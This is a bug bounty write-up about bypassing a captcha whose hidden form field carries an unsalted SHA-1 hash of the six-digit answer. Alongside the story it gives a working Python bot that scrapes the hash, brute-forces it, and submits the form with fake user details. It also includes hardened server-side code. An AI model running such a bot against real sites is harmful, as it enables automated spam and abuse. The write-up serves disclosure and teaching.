Bypassing Captcha Like a Boss

Ak1T4
Apr 16, 2018 · 3 min read

Hello Hunters! It's been a while since my last write-up, so I decided to share a fun experience I had while hunting on a private program.

What the hell is a captcha?

From my point of view: a captcha is mostly used to keep bots out and to make sure that the user behind the app is a real human. That guarantee only holds if the answer to the challenge stays on the server and is never handed to the client.

Sharing is caring, so let's go to the write-up!

Mapping the application, I found a subscription endpoint protected by a captcha check like this:

http://example.com/captcha/captchaCheck?


This quickly caught my attention, so I moved to the page source:

<form action="/captcha/captchaCheck" method="post">
<input name="hash" value="09573e52f752f3f5e6250b62aa34b8a8c08a4d22" type="hidden">
<input name="emailAddress" value="test@email.com" type="hidden">
<input name="name" value="" type="hidden">
<input name="enteredValue" size="25" type="text">
<input value="Subscribe" type="submit">
</form>

If you look at the form you can see two interesting parameters:

"hash" (a hex digest sent to the client in a hidden field; at 40 hex characters it has the length of a SHA-1 digest) and "enteredValue" (the number the user reads from the captcha image)

So I filled in the captcha and sent the form.

At this point I needed to understand the behavior of this captcha check, and this is what I found:

If "enteredValue" matches "hash" (that is, hashing the entered number gives the hash that was sent in the form), the request is accepted.

If "enteredValue" does not match "hash", the request is blocked.

Nice, so it's quite simple: if the parameters match, the request is accepted. Now the real question is: can that hash be reversed? A hash is not encryption, so there is nothing to "decrypt", but a plain, unsalted hash of a six-digit number has only a million possible inputs, so a lookup table or a quick brute force recovers the answer. Challenge accepted!


So I pasted the hash into my terminal and tried to reverse it with "dcipher":

(dcipher looks hashes up in online rainbow tables [hash toolkit, GromWeb, MD5Hashing] and lookup-table attack services; it only succeeds because the hash is unsalted and the input space is tiny.)


Nice! Reversed: OK! The six-digit number that came back was exactly the number shown in the captcha image.

Well well well, now we have all the pieces on the table, so let's create a bot!

I created a Python bot for PoC purposes to show how easily an attacker can bypass this captcha and abuse the functionality behind it:

1) First the bot sends a request to the subscription page with the captcha -> https://company.com/captcha/form/?
2) The bot scrapes the page and retrieves the value of the 'hash' param.
3) The bot reverses the hash (dcipher).
4) With the recovered value the bot builds a POST request to http://company.com//captcha/captchaCheck and automatically fills all the required user form params with random values (email, name, IP address, etc.)
5) The bot sends the POST request and bypasses the captcha.
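The following is an added example, not the author's bot and not code from the program: it implements steps 2 to 5 above and the hash reversal described earlier, but instead of querying the online lookup tables that dcipher uses it brute-forces the 10**6 possible six-digit answers locally, picking the digest algorithm from the hex length (40 characters is assumed to be SHA-1). The field names come from the form in the write-up; the sample form, the answer "042913" and the e-mail address are constructed test data. Nothing is sent over the network unless you uncomment the submit call.

```python
import hashlib
import re
import urllib.parse
import urllib.request

# Digest algorithm guessed from the hex length of the "hash" field (assumption:
# the 40-char hash in the write-up is SHA-1; md5/sha256 handled the same way).
ALGO_BY_LEN = {32: "md5", 40: "sha1", 64: "sha256"}

# Field names taken from the form markup in the write-up.
HASH_FIELD = "hash"
ANSWER_FIELD = "enteredValue"


def hash_answer(answer: str, algo: str = "sha1") -> str:
    """Hex digest of a captcha answer, the way the vulnerable form appears to compute it."""
    return hashlib.new(algo, answer.encode()).hexdigest()


def extract_hidden_fields(html: str) -> dict:
    """Step 2: scrape every hidden <input> (name -> value) out of the form markup."""
    fields = {}
    for tag in re.findall(r"<input[^>]*>", html, flags=re.I):
        if not re.search(r'type="hidden"', tag, flags=re.I):
            continue
        name = re.search(r'name="([^"]*)"', tag)
        value = re.search(r'value="([^"]*)"', tag)
        if name:
            fields[name.group(1)] = value.group(1) if value else ""
    return fields


def recover_answer(digest: str, digits: int = 6):
    """Step 3, done offline: exhaustive search over all N-digit numbers.
    Works because the digest is unsalted and the input space is only 10**digits.
    Returns the zero-padded answer, or None if nothing matches."""
    digest = digest.lower()
    algo = ALGO_BY_LEN.get(len(digest))
    if algo is None:
        raise ValueError("unrecognised digest length %d" % len(digest))
    for n in range(10 ** digits):
        candidate = str(n).zfill(digits)
        if hashlib.new(algo, candidate.encode()).hexdigest() == digest:
            return candidate
    return None


def build_submission(form_html: str, email: str, name: str) -> dict:
    """Steps 2-4: scrape the hash, reverse it, and fill in the POST body
    with the recovered answer and attacker-chosen user details."""
    fields = extract_hidden_fields(form_html)
    answer = recover_answer(fields[HASH_FIELD])
    if answer is None:
        raise RuntimeError("could not reverse captcha hash")
    fields[ANSWER_FIELD] = answer
    fields["emailAddress"] = email
    fields["name"] = name
    return fields


def submit(url: str, payload: dict) -> int:
    """Step 5: POST the filled form and return the HTTP status. Not called offline."""
    data = urllib.parse.urlencode(payload).encode()
    with urllib.request.urlopen(url, data=data, timeout=10) as resp:
        return resp.status


def sample_form(answer: str) -> str:
    """Constructed copy of the write-up's form with a freshly computed hash (test data)."""
    return (
        '<form action="/captcha/captchaCheck" method="post">'
        '<input name="hash" value="%s" type="hidden">'
        '<input name="emailAddress" value="test@email.com" type="hidden">'
        '<input name="name" value="" type="hidden">'
        '<input name="enteredValue" size="25" type="text">'
        '<input value="Subscribe" type="submit">'
        '</form>' % hash_answer(answer)
    )


if __name__ == "__main__":
    html = sample_form("042913")          # stands in for the GET in step 1
    body = build_submission(html, "bot-1@example.com", "bot")
    print(body)                           # enteredValue was recovered from the hash alone
    # submit("https://company.com/captcha/captchaCheck", body)  # real target, not run here
```

Because the algorithm is chosen by digest length, the same loop reverses an MD5 or SHA-256 variant of the form just as easily; only a salt or secret the client never sees, or keeping the answer off the client altogether, defeats it.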

The bot is very basic but works like a charm, so I sent this PoC to the program with the following explanation:

Security Impact

An attacker can create a bot that bypasses the captcha and automates sending unlimited requests to multiple URLs or lists with random/fake users, emails and IP addresses, for spamming or other malicious purposes (collecting data, analyzing traffic behavior, etc.). The root cause is that the server hands the client a reversible token (an unsalted hash of the answer) instead of keeping the answer server-side.
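To make the fix concrete, here is an added example (not code from the program or the author) that puts the check the form implies next to a hardened one. The vulnerable version accepts whenever the hash of the submitted value equals the hash the client itself supplied, so the server keeps no state and anyone who reverses the hash passes. The hardened version puts only a random, single-use token in the form and keeps the answer server-side. SHA-1 as the digest is an assumption based on the 40-character hash in the write-up, and SESSIONS is a stand-in for real server-side session storage.

```python
import hashlib
import hmac
import secrets

# Stand-in for server-side session storage (assumption; a real app would use
# its session store with an expiry on each entry).
SESSIONS: dict = {}


def leak_hash(answer: str) -> str:
    """What the vulnerable form embeds as "hash": an unsalted SHA-1 of the answer (assumed)."""
    return hashlib.sha1(answer.encode()).hexdigest()


# --- vulnerable: the client holds everything needed to pass the check ---
def vulnerable_check(hash_from_client: str, entered_value: str) -> bool:
    """Accepts when sha1(enteredValue) == hash. The hash came from the client,
    so the server never has to remember which image it served; anyone who can
    reverse a 6-digit unsalted hash passes without ever looking at the image."""
    return hashlib.sha1(entered_value.encode()).hexdigest() == hash_from_client.lower()


# --- hardened: opaque token on the client, answer only on the server ---
def issue_challenge(answer: str) -> str:
    """Store the answer under a random, single-use token; only the token goes into the form."""
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = answer
    return token


def hardened_check(token: str, entered_value: str) -> bool:
    """Look the answer up by token, compare in constant time, and burn the token
    whether or not the guess was right, so a challenge cannot be brute-forced
    or replayed. An unknown or already-used token is rejected."""
    answer = SESSIONS.pop(token, None)
    if answer is None:
        return False
    return hmac.compare_digest(answer.encode(), entered_value.encode())


if __name__ == "__main__":
    answer = "042913"                      # constructed captcha answer
    leaked = leak_hash(answer)
    print("vulnerable, state-free:", vulnerable_check(leaked, answer))
    tok = issue_challenge(answer)
    print("hardened, wrong guess burns token:", hardened_check(tok, "000000"))
    print("hardened, replay of same token:", hardened_check(tok, answer))
```

The token reveals nothing about the answer, so the scraping step in the bot gains the attacker nothing, and burning the token on every attempt means each served image can be guessed at most once; add per-IP rate limiting on top and the 10**6 search space stops being a problem.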

(The program had a really fast response: < 1h)

TIMELINE

Submitted 2018–04–16 03:51:17 UTC

Team Response with triage and bounty 2018–04–16 04:48:17 UTC

(Bounty $ xxx)

So ak1t4 is happy!


I hope you enjoyed reading this as much as I enjoyed writing it!

And remember: if you fail, try harder!

Happy Hunting!


Ak1T4

Written by

Ak1T4

WhiteHat Hacker Zen Monk & Bounty Hunter

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew
